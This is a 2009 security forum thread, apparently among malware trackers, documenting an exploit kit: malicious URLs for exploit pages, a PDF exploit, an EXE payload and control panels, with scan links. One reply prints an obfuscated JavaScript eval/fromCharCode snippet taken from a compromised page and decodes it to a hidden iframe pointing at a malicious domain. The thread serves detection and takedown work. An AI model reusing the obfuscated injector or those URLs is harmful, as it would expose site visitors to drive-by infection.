Topic: 91.212.65.149

May 14, 2009, 09:52:10 am

GmG
Exploit
Code:
http://copyolist.com/image/index.php
Wepawet: Invalid hostname.

PDF exploit
Code:
http://copyolist.com/image/pfgt.php
http://wepawet.iseclab.org/view.php?hash=f0d46450ad8c1b4ea1d3e0e18d7bb0a5&type=js

EXE
Code:
http://copyolist.com/image/qaze.php
http://www.virustotal.com/it/analisis/f64675ceb6f39cd1c20838f94ec3fcd5

May 14, 2009, 10:01:45 am
Reply #1

SysAdMini
Control panel
Code:
copyolist.com/image/admin.php
Ruining the bad guy's day

May 30, 2009, 12:27:36 am
Reply #2

MysteryFCM
foxionserl.com

Ref:
http://vurl.mysteryfcm.co.uk/?url=642592

Code is at the bottom of the source:

Code:
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))
Which decodes to:

Code:
var xew=9871311;var ghg45="foxi";var w="on";var re6="serl.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); function d(){var s=4345;} var rre=8828382
Final:

Code:
<iframe src="http://foxionserl.com/" width="1" height="3"></iframe>
Strangely, foxionserl.com is returning a 200 status, but no content (headers show content length = 0)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 30, 2009, 06:28:37 am
Reply #3

SysAdMini
Contains an iframe directing to pfgt.php only once. A second attempt returns an empty response.
Code:
foxionserl.com

PDF exploit
Code:
foxionserl.com/image/pfgt.php
http://www.virustotal.com/analisis/7c9c6d59b0111d75ed91ccc9ee997233e61c0eccefd9d0d5913de79dd209d698-1243664730 15/40

Payload
Code:
foxionserl.com/image/qaze.php
http://www.virustotal.com/analisis/773ee15ec732b67ce656c47a7914db6842241efd825fa0275dcea56d6df7d545-1243664549 6/40

AdPack control panel
Code:
foxionserl.com/image/admin.php

May 30, 2009, 12:59:45 pm
Reply #4

MysteryFCM
Nice one, cheers :)